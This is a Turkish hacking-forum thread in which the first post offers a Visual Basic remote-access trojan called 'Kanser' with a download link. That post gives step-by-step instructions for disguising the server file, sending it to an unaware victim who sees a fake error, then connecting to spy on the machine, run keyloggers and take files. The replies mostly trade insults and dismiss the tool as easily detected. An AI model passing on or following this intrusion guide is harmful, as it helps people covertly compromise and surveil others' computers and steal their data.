Kanser 1.0.1 Bir Deneyin Ve Görün !!!

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Server_Kurdu
    Server_Kurdu's avatar
    Erkek

KANSER PROGRAMI BASKASININ BİLGİSAYARINA GİRMEK İÇİN KULLANILIR

DOWNLOAD LİNKİ:

http://rapidshare.de/files/10606489/kanser.rar.html

visual basic 6 indirmek için eger link calışmassa forumda var

http://www.forumta.com/showthread.ph...visual+basic+6

visual basic 6 runtime için

http://rapidshare.de/files/5626047/vbrun60sp5.exe.html

Kanser nasıl kullanılır?

Kanserin içinde 2 adet server bulunur "IsımVerin.exe" ve "KanserServer.exe" eğer bilgi
    sayarınıza girecek kişi gireceğinizi biliyorsa KanserServer.exe yi yollayın ve rahat
    ça girin
    Ha yok gireceğinizi bilmiyorsa eğlence için veya casusluk için giriyorsanız
    a) IsımVerin.exe dosyasının adını hayalgücünüzü kullanarak değiştirin
    b) Karşı tarafa bu dosyayı yollayın (sakın siz açmayın!)
    c) Karşı taraf bu dosyayı açtığında "Bu program sadece linux sistemlerde çalışmak
    tadır" diye bi uyarı alacak ve program kapanacak.
    d) Daha sonra siz KanserClient.exe yi açarak "Bağlan" tuşuna basın ve kurbanın
    ip adresini yazın port kısmını ellemeyerek bağlan tuşuna basın.
    e) Bu kadar! artık bilgisayarda cirit atabilirsiniz

Çalıştığını nasıl anlarım?

İlk önce kendi bilgisayarınızda KanserServer.exe 'yi açın.Ardından KanserClient'i açın
    bağlan tuşuna basın ve bağlanın.Kendi bilgisayarınıza girdiniz

Kanser'in özellikleri nelerdir?

Kanser ile girdiğiniz bilgisayarda cd-romla oynayabilirsiniz, ses çıkarıp deli edebilir
    siniz,Bilgisayara reset atabilirsiniz (çok eğlenceli oluyor),masaüstünü görebilirsiniz,
    istediğiniz programı çalıştırabilirsiniz(keylogger vb. dahil),İstediğiniz dosyayı çeke
    bilirsiniz,karşı tarafa mesaj yollayabilirsiniz vs..

"Connection Failed" hatası alıyorum?

Bu hata karşı taraf serveri yememiş anlamındadır.Bunun çeşitli sebepleri olabilir.

Programı açarken runtime hataları veriyor?

O halde hiç beklemeden önce visual basic sonrada visual basic 6 runtime paketini yükleyin.Eğer hala hata veriyorsa hatada bi dosya is
    mi varsa o dosyayı googlede aratıp windows/system dosyasına kopyalayın

HERŞEY TaHRiBaT içiN

2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Kreston
    Kreston's avatar
    Üstün Hizmet Madalyası
    Erkek

tabi bunu dünyada ne virüs tarama programı nede başka bişey tanımıyor nede olsa visual basicde yazılmış ve winsock kullanıyor :D

Zimbabwe
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    a4tech
    a4tech's avatar
    Erkek
    ehuehueuh :D
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Server_Kurdu
    Server_Kurdu's avatar
    Erkek

sanki sen normal trojanle antivirüs programına yakalanmadan girebiliyosun

pekiiii sana bişi soracam madem çok biliyosun yada bildigini zannediyosun sen benim kadar da olsa hiç olmassa TAHRİBAT için bişi yaptın mı ? Ben ForumLara Çok baktım ama senLe iLgiLi FazLa bişi Göremedim ?

5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    VisualBoy
    VisualBoy's avatar
    Erkek
    lan server misin nesin adam modluk yaptı burda bir ara yada ben oyle hatırlıyorum. dün poktun bugün koktun. yaptığın yalakalığın daniskası. tahribat için ne yaptın? soruya bak. kimse kanseri bilmiyomu kansere sıra gelene kadar dünyanın trojan ı var "optix pro" var "flux" var. lazım olan gider arar bulur bulunamayacak bişey olsa neyse.

HolyOne'a ulasinca, bildirecegim...
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Server_Kurdu
    Server_Kurdu's avatar
    Erkek
    VisualBoy bunu yazdı:

lan server misin nesin adam modluk yaptı burda bir ara yada ben oyle hatırlıyorum. dün poktun bugün koktun. yaptığın yalakalığın daniskası. tahribat için ne yaptın? soruya bak. kimse kanseri bilmiyomu kansere sıra gelene kadar dünyanın trojan ı var "optix pro" var "flux" var. lazım olan gider arar bulur bulunamayacak bişey olsa neyse.

ne yalakalıgı lan a.q biz dün de vardık bugün de varız sen sanki bizden bi farkın var sen nesin sanki 2004 üye oldun diye bizden daha mı ? üstünsün eger kolay bişiyse sen niye gelipte linki sen vermedin veya çok çok kolaydı da millet niye vermedi ? bak madem çok biliyosun şuraya adam gibi baba baba programlar koy bizde tebrik edelim biraz emege saygı gösterin eger bu programı HolyOne gibi site yöneticisi ve yada Moderatör koysaydı senin ilk yapçagın şey yalakalık ve hani şu seçimlerde aday olan kişilerin attıgı palavraları alkışlayan kısacası ŞAKŞAKÇI  olacaktın .... Emege Saygı GösTeRELim !!!!!!!!
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    amele_2
    amele_2's avatar
    Erkek
    bahsettiğin insanın adı Kreston ve tbt için senin düşünemeyeceğin şeyler yapmış biri

Ardından yüz köpek havlamayan kurt, kurt sayılmaz..
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    fenerist07
    fenerist07's avatar
    Erkek
    snin Kreston dediin adam bi zamannlar moddu tahribatta.bilmiosun bari konusma.rene nin bi lafı vardı ''üyesi olduu hack sitesini admininden daha cok benimeyen ezik profili'' aynı sana uyuyo bu..bu sitedekiler en azından vbasic ile yapılmıs trojanı kullanmayacak kadar profesyoneldir hoja..

Amphetamine Logic.
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Hakankaya
    Hakankaya's avatar
    Erkek

VisualBoy bunu yazdı:

O en azından poktu koktu,sen işedigimiz sidik bile degilsin..Forma yazı yazmayı bilmiyorsan yazma istersen ilk kuruldugu zaman üye ol önce adam ol lan adamca cvb versene millet sana en ufak laf etse havlarsın ama

10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Connection
    Connection's avatar
    Erkek

om bırbırınıze destek olcagınıza kostek oluyonuz soyle dıyelım konu kapansın

PAYLASIM ICIN TESEKKURLER ARKADASIM

"Çevrelerine uymak için kendini yontanlar,tükenip giderler" Connection® MSN: koray@maviates.org
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Imba
    Imba's avatar
    Erkek

server_kurdu-->id=25073
    kreston         -->id=2460

hmmm kreston un arkadşaım olmasını bi kenara koyuorum foruma yapılan katkıdan bahsetmek istiyorum sence senden 21 bin kişi önce kayıt olmuş admaın foruma senden az katkı yapması mümkünmüdür

amele_2 demişki

bahsettiğin insanın adı Kreston ve tbt için senin düşünemeyeceğin şeyler yapmış biri 

sen demişsinki
    ne yalakalıgı lan a.q biz dün de vardık bugün de varız sen sanki bizden bi farkın var sen nesin sanki 2004 üye oldun diye bizden daha mı ? üstünsün eger kolay bişiyse sen niye gelipte linki sen vermedin veya çok çok kolaydı da millet niye vermedi ? bak madem çok biliyosun şuraya adam gibi baba baba programlar koy bizde tebrik edelim biraz emege saygı gösterin eger bu programı HolyOne gibi site yöneticisi ve yada Moderatör koysaydı senin ilk yapçagın şey yalakalık ve hani şu seçimlerde aday olan kişilerin attıgı palavraları alkışlayan kısacası ŞAKŞAKÇI  olacaktın .... Emege Saygı GösTeRELim !!!!!!!! 

2. oalrak kresyton açıklamış vb ve windosck kullandıı için forumda ki hiç bi mod yada adminleirmizden hiç biri böle bi programı buraya koymaz ,koysalar bile  herkesin aynı tepkiyi verceğinnde emin oalbilrsin ayrıca sen ztn foruma katkıyı kafana takmışsın bi kere adama 2004 de üye oldun die biz den üstünmü görüosun kendini diosun sen katkı yapıosunda ne oluyo şuna bak.....

uzun lafın kısası millete dil uzatırken biraz düşüncen öle her kezeede laf atmaya çalışma....

Kibar ve sertimdir, çok iyi dans ve ısrar ederim..
Toplam Hit: 7186 Toplam Mesaj: 33